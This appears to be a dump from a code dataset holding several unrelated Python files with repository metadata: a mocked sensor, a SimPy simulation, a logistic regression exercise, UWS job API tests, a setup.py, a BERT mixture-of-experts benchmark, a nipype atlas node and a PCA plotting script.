seq_id stringlengths 4 11 | text stringlengths 113 2.92M | repo_name stringlengths 4 125 ⌀ | sub_path stringlengths 3 214 | file_name stringlengths 3 160 | file_ext stringclasses 18
values | file_size_in_byte int64 113 2.92M | program_lang stringclasses 1
value | lang stringclasses 93
values | doc_type stringclasses 1
value | stars int64 0 179k ⌀ | dataset stringclasses 3
values | pt stringclasses 78
values |
|---|---|---|---|---|---|---|---|---|---|---|---|---|
73519498715 | ####################################################################################################################################
# Mocked Environmental Sensor
#
# Used for testing or when not all devices are available in hardware
#
# Create an instance of this class, and specify which of the three parameters you want to simulate
#
# Each is simulated as a sinusoid; the three signals are offset in phase by roughly 120 degrees (2.09 rad), not 20.
# The cycle time is specified in seconds
#
# The following two are identical
# sensor = MockedEnvSensor(cycle_time=6, requirements=["temp", "humid", "pres"])
# sensor = MockedEnvSensor(cycle_time=6)
#
# If you only want temperature, with a time period of 60 seconds
# sensor = MockedEnvSensor(cycle_time=60, requirements=["temp"])
#
# To read simulated values as a dictionary of key-value pairs, use the read() API
# vals = sensor.read()
#
# Example output:
# {
# 'time': datetime.datetime(2023, 7, 12, 22, 8, 45, 499411),
# 'temp': 6.433710564175197,
# 'pres': 1009.7842888067954,
# 'humid': 43.01135322187372
# }
#
# The date and time are a datetime object.
#
####################################################################################################################################
import sys
import time
import datetime
import math
from EnvSensorCapability import EnvSensorCapability
# Simulates a device for measuring air temperature, pressure and humidity
class MockedEnvSensor(EnvSensorCapability):
    """Mocked environmental sensor for testing without real hardware.

    Temperature, pressure and humidity are each simulated as a sinusoid
    between the supplied min/max values, with the three signals offset in
    phase by roughly 120 degrees (2.09 rad).  ``cycle_time`` is the sinusoid
    period in seconds, and ``requirements`` selects which measurements
    ``read()`` reports (defaults to all three).
    """
    def __init__(self,
                 temp_min: float = 0.0, temp_max: float = 30.0,
                 pres_min: float = 900, pres_max: float = 1010,
                 humid_min: float = 20.0, humid_max: float = 99.0,
                 cycle_time: int = 60, requirements=None):
        # Avoid the shared-mutable-default pitfall: build the default list per
        # instance instead of once at function-definition time.
        if requirements is None:
            requirements = ["temp", "pres", "humid"]
        # Initialise parent class
        super().__init__(has_temp=True, has_humidity=True, has_pressure=True, requirements=requirements)
        print("Mocked Sensor")
        # Mid-point and amplitude of each simulated sinusoid.
        self.temp_mid = (temp_min + temp_max) * 0.5
        self.temp_amplitude = temp_max - self.temp_mid
        self.pres_mid = (pres_min + pres_max) * 0.5
        self.pres_amplitude = pres_max - self.pres_mid
        self.humid_mid = (humid_min + humid_max) * 0.5
        self.humid_amplitude = humid_max - self.humid_mid
        self.T = cycle_time        # period in seconds
        self.f = 1.0 / cycle_time  # frequency in Hz
        self.start_time = time.perf_counter()
    def wave(self, phase: float = 0.0) -> float:
        """Return the sinusoid value at the current time for the given phase (radians)."""
        t = time.perf_counter() - self.start_time
        return math.sin(2*math.pi*self.f*t + phase)
    def read(self) -> dict:
        """Return a dict keyed by 'time' plus any of 'temp', 'pres', 'humid'
        that are enabled in the requirements."""
        ## Build up the data structure of measurements
        now = datetime.datetime.now()
        env_params = {
            "time" : now
        }
        # Up to three different waveforms, roughly 120 degrees (2.09 rad) apart
        if (self.requirements["temp"]):
            t = self.wave(0.0)
            env_params["temp"] = (self.temp_mid + self.temp_amplitude * t)
        if (self.requirements["pres"]):
            p = self.wave(2.09)
            env_params["pres"] = (self.pres_mid + self.pres_amplitude * p)
        if (self.requirements["humid"]):
            h = self.wave(4.18)
            env_params["humid"] = (self.humid_mid + self.humid_amplitude * h)
        return env_params
# ***************************************************************************
# ********************************** Tests **********************************
# ***************************************************************************
#
# On the desktop, pip install pandas matplotlib
#
def test1():
    """Read twice from a sensor built with the default (all channels) requirements."""
    sensor = MockedEnvSensor()  # default requirements enable every measurement
    print(sensor.capability)
    print(sensor.read())
    time.sleep(1)
    print(sensor.read())
def test2():
    """Read twice from a sensor restricted to temperature and humidity only."""
    sensor = MockedEnvSensor(cycle_time=6, requirements=["temp", "humid"])
    print(sensor.capability)
    print(sensor.read())
    time.sleep(1)
    print(sensor.read())
def test3():
    """Collect 60 readings from a fast-cycling mocked sensor, print them, and
    (on desktop CPython only) plot the three channels with matplotlib."""
    sensor = MockedEnvSensor(cycle_time=6)
    readings = []
    times = []
    print('Simulating... please wait')
    # Sample roughly every 0.1 s for 60 samples (~one full 6 s cycle).
    for _ in range(60):
        readings.append(sensor.read())
        times.append(datetime.datetime.now())
        time.sleep(0.1)
    # Echo the raw readings, then split them into per-channel series.
    for stamp, reading in zip(times, readings):
        print(f'{stamp} : {reading}')
    temp = [reading["temp"] for reading in readings]
    pres = [reading["pres"] for reading in readings]
    humid = [reading["humid"] for reading in readings]
    # matplotlib is only expected to be installed on desktop CPython.
    if sys.implementation.name == "cpython":
        import matplotlib.pyplot as plt
        plt.subplot(3,1,1)
        plt.plot(times,temp)
        plt.xticks(rotation=0, ha='right')
        plt.ylabel('Temperature')
        plt.title('Mocked Temperature Sensor')
        plt.ylim((0,60))
        plt.subplot(3,1,2)
        plt.plot(times,pres)
        plt.xticks(rotation=0, ha='right')
        plt.ylabel('Pressure')
        plt.title('Mocked Pressure Sensor')
        plt.subplot(3,1,3)
        plt.plot(times,humid)
        plt.xticks(rotation=0, ha='right')
        plt.xlabel('Time')
        plt.ylabel('Humidity')
        plt.title('Mocked Humidity Sensor')
        plt.ylim((0,100))
        plt.show()
# Run the self-tests only when this file is executed directly; importing the
# module no longer triggers them as a side effect.
if __name__ == "__main__":
    test1()
    test2()
    test3()
| motley197/brian | uPython/polytunnel/MockedEnvSensor.py | MockedEnvSensor.py | py | 5,418 | python | en | code | 1 | github-code | 50 |
#Task 1
#A continuous random variable A has a uniform distribution on the interval (200, 800).
#Find its mean value and variance.
# interval bounds
a=200
b=800
# Mean and variance of a uniform distribution on (a, b)
M=(a+b)/2
D=(b-a)**2/12
print(f'Среднее значение: {M}\n\
Дисперсия: {D}') | eterity88/DZ_4_teover | 1.py | 1.py | py | 497 | python | ru | code | 0 | github-code | 50 |
70624133596 | import sys
import os
import SimPy.SimulationTrace as sim
class Car(sim.Process):
    """A SimPy process modelling a car that drives for a fixed duration."""
    def __init__(self, name, cc):
        sim.Process.__init__(self, name=name)
        # Engine capacity; stored but not otherwise used in this example.
        self.cc = cc
    def go(self):
        """Process generator: announce the start, hold for 100 simulated time
        units, then announce arrival."""
        print("{0} {1} Starting".format(sim.now(), self.name))
        yield sim.hold, self, 100.0
        print("{0} {1} Arrived".format(sim.now(), self.name))
if __name__ == '__main__':
    # Set up the simulation clock and event list.
    sim.initialize()
    car1 = Car("Car1", 2000)
    # car1 begins driving at simulated time 6.0.
    sim.activate(car1, car1.go(), at=6.0)
    car2 = Car("Car2", 1600)
    # car2 is activated without an explicit start time (presumably starts at
    # time 0 — confirm against the SimPy activate() default).
    sim.activate(car2, car2.go())
    # Run until simulated time 200; both cars finish well before that.
    sim.simulate(until=200)
    print("Current time is {0}".format(sim.now()))
| kubkon/Phd-python | Simulation/sim1.py | sim1.py | py | 572 | python | en | code | 1 | github-code | 50 |
28051108667 | import matplotlib.pyplot as plt
import pandas as pd
from sklearn.model_selection import train_test_split
from sklearn.preprocessing import StandardScaler
from sklearn.linear_model import LogisticRegression
from sklearn.metrics import confusion_matrix
# Load the dataset
data=pd.read_csv('Produit_acheter.csv')
print(data.head())
# The User ID column is not useful here: it has no influence on the target
data.drop(['User ID'],axis='columns',inplace=True)
# Encode the Gender variable with numeric values
data.Gender = data.Gender.map({'Male': 1, 'Female': 2})
# 3D projection plot including Gender (kept for reference)
# fig = plt.figure()
# ax = plt.axes(projection='3d')
# ax.scatter(data.Gender,data.Age,data.EstimatedSalary, c=data.Purchased)
# plt.show()
# Influence of gender on purchase
table= pd.crosstab(data.Gender,data.Purchased)
table.div(table.sum(1).astype(float), axis=0).plot(kind='bar', stacked=True)
plt.title('Genre / Achat')
plt.xlabel('Genre')
plt.ylabel('Pourcentage de client')
plt.show()
# Drop the Gender column
data.drop(['Gender'],axis='columns',inplace=True)
# Influence of age on purchase
table= pd.crosstab(data.Age,data.Purchased)
table.div(table.sum(1).astype(float), axis=0).plot(kind='bar', stacked=True)
plt.title('Age / Achat')
plt.xlabel('Age')
plt.ylabel('Pourcentage de client')
plt.savefig('Age-Achat')
plt.show()
# Influence of the estimated salary on purchase
table= pd.crosstab(data.EstimatedSalary,data.Purchased)
table.div(table.sum(1).astype(float), axis=0).plot(kind='bar', stacked=True)
plt.title('Salaire / Achat')
plt.xlabel('Salaire')
plt.ylabel('Pourcentage de client')
plt.show()
# Inspect the dataset
print(data)
# Define the dependent variable y and the independent variables X
X = data.iloc[:, [0, 1]].values
y = data.iloc[:, -1].values
# Visualise the data points
plt.scatter(X[:,0],X[:,1], c=y)
plt.show()
# Split the dataset into a training set and a test set
X_train, X_test, y_train, y_test = train_test_split(X, y, test_size = 0.25, random_state = 0)
# Feature scaling (standardisation); the scaler is fit on the training set only
sc = StandardScaler()
X_train = sc.fit_transform(X_train)
X_test = sc.transform(X_test)
# Build the model
classifier = LogisticRegression(random_state = 0, solver='liblinear')
classifier.fit(X_train, y_train)
# Make predictions on the test set
y_pred = classifier.predict(X_test)
print(y_pred)
# Check the accuracy of the predictions
classifier.score(X_test,y_test)
print("Moyenne =",classifier.score(X_test,y_test))
# Confusion matrix
cm = confusion_matrix(y_test, y_pred)
print(cm)
| BENOUSSAIDarezkimalek/python_project | Regression_logistique.py | Regression_logistique.py | py | 2,597 | python | fr | code | 0 | github-code | 50 |
23602634263 | """Tests for the UWS job manipulation handlers.
These tests don't assume any given application, and therefore don't use the
API to create a job, instead inserting it directly via the UWSService.
"""
from __future__ import annotations
from datetime import timedelta
import pytest
from dramatiq import Worker
from fastapi import FastAPI
from httpx import AsyncClient
from vocutouts.uws.config import UWSConfig
from vocutouts.uws.dependencies import UWSFactory
from vocutouts.uws.utils import isodatetime
from ..support.uws import TrivialParameters, uws_broker, wait_for_job
@pytest.mark.asyncio
async def test_job_run(
    client: AsyncClient,
    uws_config: UWSConfig,
    uws_factory: UWSFactory,
) -> None:
    """Create a job via the service layer, start it through the API, run it
    with a real dramatiq worker, and verify the completed job record."""
    job_service = uws_factory.create_job_service()
    job = await job_service.create(
        "user", run_id="some-run-id", params=TrivialParameters(id="bar")
    )
    # Check the retrieval of the job configuration.
    r = await client.get("/jobs/1", headers={"X-Auth-Request-User": "user"})
    assert r.status_code == 200
    # The job record asserts a destruction time of 24 hours after creation.
    destruction = job.creation_time + timedelta(hours=24)
    assert r.json() == {
        "job_id": "1",
        "run_id": "some-run-id",
        "owner": "user",
        "phase": "pending",
        "creation_time": isodatetime(job.creation_time),
        "execution_duration": 600,
        "destruction_time": isodatetime(destruction),
        "parameters": {"id": "bar"},
    }
    # Start the job.
    r = await client.post(
        "/jobs/1/start",
        headers={"X-Auth-Request-User": "user"},
        json={"start": True},
        follow_redirects=True,
    )
    assert r.status_code == 200
    # The start endpoint redirects back to the job resource itself.
    assert r.url == "https://example.com/jobs/1"
    assert r.json() == {
        "job_id": "1",
        "run_id": "some-run-id",
        "owner": "user",
        "phase": "queued",
        "creation_time": isodatetime(job.creation_time),
        "execution_duration": 600,
        "destruction_time": isodatetime(destruction),
        "parameters": {"id": "bar"},
    }
    # Start the job worker.
    worker = Worker(uws_broker, worker_timeout=100)
    worker.start()
    # Check the job results.
    try:
        job = await wait_for_job(job_service, "user", "1")
        # Timestamps must be ordered: created <= started <= ended.
        assert job.start_time
        assert job.end_time
        assert job.end_time >= job.start_time >= job.creation_time
        r = await client.get(
            "/jobs/1", headers={"X-Auth-Request-User": "user"}
        )
        assert r.status_code == 200
        assert r.json() == {
            "job_id": "1",
            "run_id": "some-run-id",
            "owner": "user",
            "phase": "completed",
            "creation_time": isodatetime(job.creation_time),
            "start_time": isodatetime(job.start_time),
            "end_time": isodatetime(job.end_time),
            "execution_duration": 600,
            "destruction_time": isodatetime(destruction),
            "parameters": {"id": "bar"},
            "results": [
                {
                    "result_id": "cutout",
                    "url": "https://example.com/some/path",
                    "mime_type": "application/fits",
                }
            ],
        }
    finally:
        # Always stop the worker, even when the assertions above fail.
        worker.stop()
@pytest.mark.asyncio
async def test_job_api(
    client: AsyncClient,
    uws_factory: UWSFactory,
) -> None:
    """Exercise retrieval, modification, and deletion of a UWS job."""
    job_service = uws_factory.create_job_service()
    job = await job_service.create("user", params=TrivialParameters(id="bar"))
    auth = {"X-Auth-Request-User": "user"}
    # The freshly-created job should be retrievable with its default settings.
    expiry = job.creation_time + timedelta(hours=24)
    response = await client.get("/jobs/1", headers=auth)
    assert response.status_code == 200
    assert response.json() == {
        "job_id": "1",
        "owner": "user",
        "phase": "pending",
        "creation_time": isodatetime(job.creation_time),
        "execution_duration": 600,
        "destruction_time": isodatetime(expiry),
        "parameters": {"id": "bar"},
    }
    # Modify various settings. These go through the policy layer, which is
    # mocked to do nothing. Policy rejections will be tested elsewhere.
    expiry = job.creation_time + timedelta(hours=48)
    response = await client.patch(
        "/jobs/1",
        headers=auth,
        json={
            "destruction_time": isodatetime(expiry),
            "execution_duration": 1200,
        },
    )
    assert response.status_code == 200
    assert response.json() == {
        "job_id": "1",
        "owner": "user",
        "phase": "pending",
        "creation_time": isodatetime(job.creation_time),
        "execution_duration": 1200,
        "destruction_time": isodatetime(expiry),
        "parameters": {"id": "bar"},
    }
    # Deleting the job should make subsequent retrieval fail.
    response = await client.delete("/jobs/1", headers=auth)
    assert response.status_code == 204
    response = await client.get("/jobs/1", headers=auth)
    assert response.status_code == 404
@pytest.mark.asyncio
async def test_redirects(
    app: FastAPI,
    uws_factory: UWSFactory,
) -> None:
    """Test the scheme in the redirect URLs.
    When running in a Kubernetes cluster behind an ingress that terminates
    TLS, the request as seen by the application will be ``http``, but we want
    the redirect URLs to honor ``X-Forwarded-Proto`` and thus use ``https``.
    We also want to honor the ``Host`` header.
    """
    job_service = uws_factory.create_job_service()
    await job_service.create("user", params=TrivialParameters(id="bar"))
    # Start the job and ensure the resulting redirect is correct.
    async with AsyncClient(app=app, base_url="http://foo.com/") as client:
        r = await client.post(
            "/jobs/1/start",
            headers={
                "X-Auth-Request-User": "user",
                # The assertion below expects Host (example.org), not
                # X-Forwarded-Host (foo.com), to win in the redirect URL.
                "Host": "example.org",
                "X-Forwarded-For": "10.10.10.10",
                "X-Forwarded-Proto": "https",
                "X-Forwarded-Host": "foo.com",
            },
            json={"start": True},
        )
        # 303 See Other with an https URL despite the http base URL.
        assert r.status_code == 303
        assert r.headers["Location"] == "https://example.org/jobs/1"
| lsst-sqre/ivoa-cutout-poc | tests/uws/job_api_test.py | job_api_test.py | py | 6,151 | python | en | code | 0 | github-code | 50 |
25903350879 | from setuptools import setup
from channelbindjs import VERSION
import os
# Read the long description from the README that lives next to this script.
with open(os.path.join(os.path.dirname(__file__), 'README.md')) as readme:
    README = readme.read()
# allow setup.py to be run from any path
os.chdir(os.path.normpath(os.path.join(os.path.abspath(__file__), os.pardir)))
# Package metadata and dependencies for channelbindjs.
setup(
    name='channelbindjs',
    version=VERSION,
    author='Mathew Oakes',
    author_email='like@mathewoak.es',
    description=('Activate html document elements for inline editing and '
                 'live updating from a django-channels backend.'),
    url='https://github.com/moaxey/ChannelBindJS',
    license='BSD',
    long_description=README,
    install_requires=[
        'Django>=1.8',
        'channels>=1.1.6',
    ],
    packages=['channelbindjs'],
    package_data={'': ['static/channelbindjs/activate.js']},
    classifiers=[
        'Development Status :: 3 - Alpha',
        'Environment :: Web Environment',
        'Framework :: Django',
        'Intended Audience :: Developers',
        'License :: OSI Approved :: BSD License',
        'Operating System :: OS Independent',
        'Programming Language :: Python',
        'Programming Language :: Python :: 2',
        'Programming Language :: Python :: 2.7',
        'Programming Language :: Python :: 3',
        'Programming Language :: Python :: 3.4',
        'Programming Language :: Python :: 3.5',
        'Topic :: Internet :: WWW/HTTP',
    ]
)
| moaxey/ChannelBindJS | setup.py | setup.py | py | 1,436 | python | en | code | 1 | github-code | 50 |
11626573921 | import torch
import torch.distributed as dist
import torch.nn as nn
from brt.runtime.benchmark import BenchmarkArgumentManager, ResultWriter
from brt.runtime.placement import dump_decision
from modeling_bert_generation import BertGenerationConfig, BertGenerationDecoder
from transformers import BertGenerationTokenizer
def main():
    """Parse benchmark arguments, set up distributed state, build the task-MoE
    BERT decoder, and dispatch to the requested benchmark mode."""
    arg_manager = BenchmarkArgumentManager()
    parser = arg_manager.get_parser()
    parser.add_argument(
        "--mode", type=str, default="debug", choices=["debug", "throughput", "trace"]
    )
    parser.add_argument(
        "--opt", type=str, default="None", choices=["None", "placement", "pytorch"]
    )
    parser.add_argument("--seq", type=int, choices=[256, 512])
    parser.add_argument("--token", type=int, choices=[32, 64])
    args = parser.parse_args()
    # One process per GPU; the rank selects the CUDA device.
    dist.init_process_group(backend="nccl")
    local_rank = dist.get_rank()
    world_size = dist.get_world_size()
    print(f"local_rank: {local_rank}, world_size: {world_size}")
    device = torch.device("cuda", local_rank)
    torch.cuda.set_device(device)
    tokenizer = BertGenerationTokenizer.from_pretrained(
        "google/bert_for_seq_generation_L-24_bbc_encoder"
    )
    config = BertGenerationConfig()
    config.is_decoder = True
    config.task_moe = True
    config.num_tasks = 16
    # "pytorch" selects the native implementation; anything else runs via BRT.
    if args.opt == "pytorch":
        config.pt_native = True
    else:
        config.pt_native = False
    if args.opt == "placement":
        config.placement_aware = True
    else:
        config.placement_aware = False
    model = BertGenerationDecoder(config=config).cuda(device)
    # Two canned prompts; the names suggest they tokenize to roughly 64 and 32
    # tokens respectively — confirm against the tokenizer output.
    inputs_64 = tokenizer(
        "To evaluate if the Transformer can generalize to other tasks we performed experiments on English constituency parsing other tasks we performed experiments on English constituency parsing performed experiments on English To evaluate if the Transformer can generalize to other tasks we performed experiments on English constituency parsing other tasks we performed experiments on English constituency parsing performed experiments on English",
        return_token_type_ids=False,
        return_tensors="pt",
    )
    inputs_32 = tokenizer(
        "To evaluate if the Transformer can generalize to other tasks we performed experiments on English constituency parsing other tasks we performed experiments on English constituency parsing performed experiments on English",
        return_token_type_ids=False,
        return_tensors="pt",
    )
    # %%
    if args.mode == "debug":
        args.seq = 4
    # input_ids = inputs["input_ids"].repeat(4, 1).cuda()
    # Replicate the selected prompt --seq times to form the batch.
    # NOTE(review): if --token is omitted, input_ids is never bound and the
    # print below raises NameError — confirm --token is meant to be required.
    if args.token == 32:
        input_ids = inputs_32["input_ids"].repeat(args.seq, 1).cuda()
    elif args.token == 64:
        input_ids = inputs_64["input_ids"].repeat(args.seq, 1).cuda()
    print(f"local_rank: {local_rank}, input_ids.shape: {input_ids.shape}")
    # %%
    model_ddp = nn.parallel.DistributedDataParallel(
        model, device_ids=[local_rank], broadcast_buffers=False, bucket_cap_mb=4
    )
    if args.mode == "debug":
        debug(config, model_ddp, input_ids)
    elif args.mode == "throughput":
        throughput(config, model_ddp, input_ids)
    elif args.mode == "trace":
        trace(config, model_ddp, model, input_ids)
def debug(config: BertGenerationConfig, model_ddp: nn.Module, input_ids: torch.Tensor):
    """Run a fixed, hand-picked task assignment for a few iterations and print
    the logits of the last forward pass as a sanity check."""
    local_rank = dist.get_rank()
    model_ddp.eval()
    with torch.inference_mode():
        # One hard-coded task-id assignment per rank (supports two ranks).
        all_task_ids = [
            [
                1,
                0,
                3,
                2,
            ],
            [
                0,
                3,
                2,
                1,
            ],
        ]
        task_ids = torch.tensor(all_task_ids[local_rank], dtype=torch.int64).cuda()
        for i in range(10):
            # print(f"local_rank: {local_rank}, input_ids.shape: {input_ids.shape}")
            # print(f"local_rank: {local_rank}, task_ids: {task_ids}")
            outputs = model_ddp(input_ids, task_ids=task_ids)
            prediction_logits = outputs.logits
        # NOTE(review): these prints sit after the loop, so only the final
        # iteration's logits are reported.
        print(f"logits: {prediction_logits.sum()}")
        print(prediction_logits.shape)
def throughput(
    config: BertGenerationConfig, model_ddp: nn.Module, input_ids: torch.Tensor
):
    """Benchmark inference throughput over 100 iterations with random task
    assignments and append the result (samples/s) to a CSV file."""
    bench_iteration = 100
    model_ddp.eval()
    all_task_ids = []
    # Seed per rank so every process draws a distinct task-id sequence.
    torch.random.manual_seed(dist.get_rank())
    # num_per_task = input_ids.size(0) // config.num_tasks
    # task_ids = torch.arange(config.num_tasks, dtype=torch.int64).repeat(num_per_task)
    # for _ in range(bench_iteration):
    #     all_task_ids.append(task_ids[torch.randperm(task_ids.size(0))])
    # Pre-generate one random task assignment per benchmark iteration.
    for _ in range(bench_iteration):
        all_task_ids.append(torch.randint(0, config.num_tasks, (input_ids.size(0),)))
    result_fname = "task_moe/throughput.csv"
    result_writer = ResultWriter(result_fname)
    with torch.inference_mode():
        # Warm up before timing so one-time setup costs are excluded.
        for i in range(20):
            outputs = model_ddp(input_ids, task_ids=all_task_ids[i])
        torch.cuda.synchronize()
        if dist.get_rank() == 0:
            print("warmup done, start benchmark")
        # Time the benchmark loop with CUDA events for GPU-side timing.
        start_event = torch.cuda.Event(enable_timing=True)
        end_event = torch.cuda.Event(enable_timing=True)
        dist.barrier()
        start_event.record(torch.cuda.current_stream())
        for i in range(bench_iteration):
            outputs = model_ddp(input_ids, task_ids=all_task_ids[i])
        end_event.record(torch.cuda.current_stream())
        end_event.synchronize()
        # elapsed_time() is in milliseconds, hence the * 1000 for samples/s.
        benched_throughput = (
            bench_iteration
            * input_ids.size(0)
            / start_event.elapsed_time(end_event)
            * 1000
        )
        # Label the CSV row by implementation variant.
        if config.pt_native:
            item = "Torch"
        else:
            if config.placement_aware:
                item = "BRT+P"
            else:
                item = "BRT"
        GPUS = dist.get_world_size()
        seq_num = input_ids.size(0)
        token_num = input_ids.size(1)
        result_writer.write(
            f"{item},{GPUS}GPUx{int(16/GPUS)}E,{seq_num}Seqsx{token_num}Tokens,{benched_throughput}"
        )
        print(
            f"local_rank: {dist.get_rank()}, throughput: {benched_throughput} samples/s"
        )
def trace(
    config: BertGenerationConfig,
    model_ddp: nn.Module,
    model: nn.Module,
    input_ids: torch.Tensor,
):
    """Run a fixed number of inference iterations with random task ids, then
    dump the resulting placement decision for the wrapped model."""
    iterations = 100
    model_ddp.eval()
    # Seed per rank so every process draws its own task-id sequence.
    torch.random.manual_seed(dist.get_rank())
    batch = input_ids.size(0)
    task_id_batches = [
        torch.randint(0, config.num_tasks, (batch,)) for _ in range(iterations)
    ]
    with torch.inference_mode():
        for task_ids in task_id_batches:
            model_ddp(input_ids, task_ids=task_ids)
    dump_decision(model)
# Script entry point.
if __name__ == "__main__":
    main()
# %%
| Raphael-Hao/brainstorm | benchmark/task_moe/benchmark.py | benchmark.py | py | 6,790 | python | en | code | 26 | github-code | 50 |
26563684006 | from nipype.interfaces.base import BaseInterfaceInputSpec, BaseInterface, File, TraitedSpec, traits
from nipype import Node
from panpipelines.utils.util_functions import *
from panpipelines.utils.transformer import *
import os
import glob
import nibabel as nb
from nipype import logging as nlogging
IFLOGGER=nlogging.getLogger('nipype.interface')
def atlascreate_proc(labels_dict,roi_list,roilabels_list):
    """Create a participant-level atlas (NIfTI image plus text label index)
    from a list of ROI images.

    Args:
        labels_dict: pipeline parameter dictionary queried/updated through
            getParams/updateParams.
        roi_list: list of ROI image paths, or the special token
            "hcpmmp1aseg" as the first entry.
        roilabels_list: one label string per ROI; an entry of the form
            "get_freesurfer_atlas_index:<lutfile>" expands into a
            FreeSurfer-derived index block.

    Returns:
        dict with the atlas file, its index file, the output directory, and
        a combined output file list.
    """
    cwd=os.getcwd()
    labels_dict = updateParams(labels_dict,"CWD",cwd)
    output_dir = cwd
    participant_label = getParams(labels_dict,'PARTICIPANT_LABEL')
    atlas_name = getParams(labels_dict,'ATLAS_NAME')
    # Scratch directory for intermediate files.
    atlas_workdir = os.path.join(cwd,'{}_workdir'.format(atlas_name))
    if not os.path.isdir(atlas_workdir):
        os.makedirs(atlas_workdir)
    atlas_file = newfile(cwd, atlas_name, prefix=f"sub-{participant_label}", extension="nii.gz")
    IFLOGGER.info(f"Creating new atlas {atlas_file}")
    special_atlas_type=""
    # scan through the roi list and find out if we have a special atlas type
    # NOTE(review): assumes roi_list is non-empty — confirm upstream guarantees this.
    if roi_list[0] == "hcpmmp1aseg":
        special_atlas_type="hcpmmp1aseg"
        # NOTE(review): this assignment is immediately overwritten below by
        # getParams — confirm whether "3D" was meant to be the fallback.
        atlas_type = "3D"
    atlas_type = getParams(labels_dict,'NEWATLAS_TYPE')
    # Build the atlas according to the requested type.
    if special_atlas_type == "hcpmmp1aseg":
        # Special case: the label list is regenerated and the single combined
        # atlas file replaces the ROI list.
        roilabels_list=create_3d_hcpmmp1_aseg(atlas_file,roi_list,labels_dict)
        roi_list = [atlas_file]
    elif atlas_type == "3D":
        create_3d_atlas_from_rois(atlas_file, roi_list,labels_dict)
    elif atlas_type == "3D_contig":
        create_3d_atlas_from_rois(atlas_file, roi_list,labels_dict,explode3d=False)
    elif atlas_type =="4D":
        create_4d_atlas_from_rois(atlas_file, roi_list,labels_dict)
    else:
        # Default to a 3D atlas when no (or an unknown) type is specified.
        create_3d_atlas_from_rois(atlas_file, roi_list,labels_dict)
    atlas_index = newfile(cwd, atlas_name, prefix=f"sub-{participant_label}", extension="txt")
    IFLOGGER.info(f"Creating new atlas index {atlas_index}")
    # Write one label per line; special entries expand to a FreeSurfer index.
    with open(atlas_index,"w") as outfile:
        for roi_num in range(len(roilabels_list)):
            roiname=roilabels_list[roi_num]
            if roiname.split(":")[0] == "get_freesurfer_atlas_index":
                roi_atlas_file= roi_list[roi_num]
                lutfile = substitute_labels(roiname.split(":")[1],labels_dict)
                atlas_dict,atlas_index_out=get_freesurferatlas_index(roi_atlas_file,lutfile,None)
                outfile.write(atlas_index_out)
            else:
                outfile.write(roiname + "\n")
    # Expose index first, then atlas, in the combined file list.
    out_files=[]
    out_files.insert(0,atlas_file)
    out_files.insert(0,atlas_index)
    return {
        "atlas_file":atlas_file,
        "atlas_index":atlas_index,
        "output_dir":output_dir,
        "out_files":out_files
    }
class atlascreateInputSpec(BaseInterfaceInputSpec):
    """Input specification for the atlascreate nipype interface."""
    labels_dict = traits.Dict({},mandatory=False,desc='labels', usedefault=True)
    roi_list = traits.List(desc='list of roi files')
    roilabels_list = traits.List(desc='list of labels')
class atlascreateOutputSpec(TraitedSpec):
    """Output specification for the atlascreate nipype interface."""
    atlas_file = File(desc='new atlas file')
    atlas_index = File(desc='new atlas index file')
    output_dir = traits.String(desc="new atlas output directory")
    out_files = traits.List(desc='list of files')
class atlascreate_pan(BaseInterface):
    """Nipype interface wrapping atlascreate_proc."""
    input_spec = atlascreateInputSpec
    output_spec = atlascreateOutputSpec
    def _run_interface(self, runtime):
        # Call our python code here:
        outputs = atlascreate_proc(
            self.inputs.labels_dict,
            self.inputs.roi_list,
            self.inputs.roilabels_list
        )
        # Stash the result dict for _list_outputs.
        setattr(self, "_results", outputs)
        # And we are done
        return runtime
    def _list_outputs(self):
        return self._results
def create(labels_dict,name="atlascreate_node",roi_list="",roilabels_list="", LOGGER=IFLOGGER):
    """Build a nipype Node wrapping the atlascreate interface and wire up its
    inputs from the supplied arguments."""
    node = Node(atlascreate_pan(), name=name)
    if LOGGER:
        LOGGER.info(f"Created Node {node!r}")
    # Forward every input onto the interface in one pass.
    for trait_name, trait_value in (
        ("labels_dict", labels_dict),
        ("roi_list", roi_list),
        ("roilabels_list", roilabels_list),
    ):
        setattr(node.inputs, trait_name, trait_value)
    return node
| MRIresearch/PANpipelines | src/panpipelines/nodes/atlascreate.py | atlascreate.py | py | 4,107 | python | en | code | 0 | github-code | 50 |
40239391145 | """This file performs PCA on the embeddings and plots the results.
"""
import os
import numpy as np
from sklearn.decomposition import PCA
from sklearn.svm import LinearSVC
from sklearn.model_selection import train_test_split
import matplotlib.pyplot as plt
from tabulate import tabulate
import pandas as pd
from sklearn.feature_selection import VarianceThreshold
def embeddingPCA(embeddings, dim):
    """Performs PCA on the embeddings and plots the results.

    Args:
        embeddings (list): Paths to saved embedding arrays; each file is
            expected to hold a (10, 1024) array, others are skipped.
        dim (int): Dimension of the scatter plot, either 2 or 3.
    """
    # Load the embeddings as numpy arrays, skipping malformed files.
    load_embeds, labels = [], []
    for embedding in embeddings:
        embed = np.load(embedding, allow_pickle=True)
        if np.shape(embed) != (10, 1024):
            continue
        # The class label is the first three characters of the parent directory name.
        labels.append(embedding.split('/')[-2][:3])
        load_embeds.append(embed)
    # Flatten each (10, 1024) embedding into a single feature vector and fit PCA.
    pca = PCA(n_components=10)
    nsamples, nx, ny = np.shape(load_embeds)
    load_embeds_PCA = np.reshape(load_embeds, (nsamples, nx*ny))
    pca.fit(load_embeds_PCA)
    # get the new embeddings
    load_embeds_PCA = pca.transform(load_embeds_PCA)
    # Labels are numeric directory prefixes; passing the integers as ``c``
    # lets matplotlib colour the classes directly.  (A manual 50-entry colour
    # table previously built here was never used by the scatter calls and
    # contained invalid matplotlib colour names; removed as dead code.)
    labels = [int(label) for label in labels]
    plt.figure(figsize=(8,5))
    if dim == 2:
        # plot the embeddings 2D with label colors for the 50 classes
        plt.subplot(1, 2, 1)
        plt.title('PCA of the embeddings')
        plt.scatter(load_embeds_PCA[:, 0], load_embeds_PCA[:, 1], c=labels)
        plt.xlabel('PC1')
        plt.ylabel('PC2')
    elif dim == 3:
        # plot the embeddings 3D with label colors for the 50 classes
        plt.title('PCA of the embeddings')
        ax = plt.axes(projection='3d')
        ax.scatter3D(load_embeds_PCA[:, 0], load_embeds_PCA[:, 1], load_embeds_PCA[:, 2], c=labels)
        plt.xlabel('PC1')
        plt.ylabel('PC2')
    plt.show()
    # Cumulative share of variance explained by the first k components.
    exp_var_cumul = np.cumsum(pca.explained_variance_ratio_)
    plt.subplot(1, 2, 2)
    plt.title('Cumulative explained variance')
    plt.plot(exp_var_cumul)
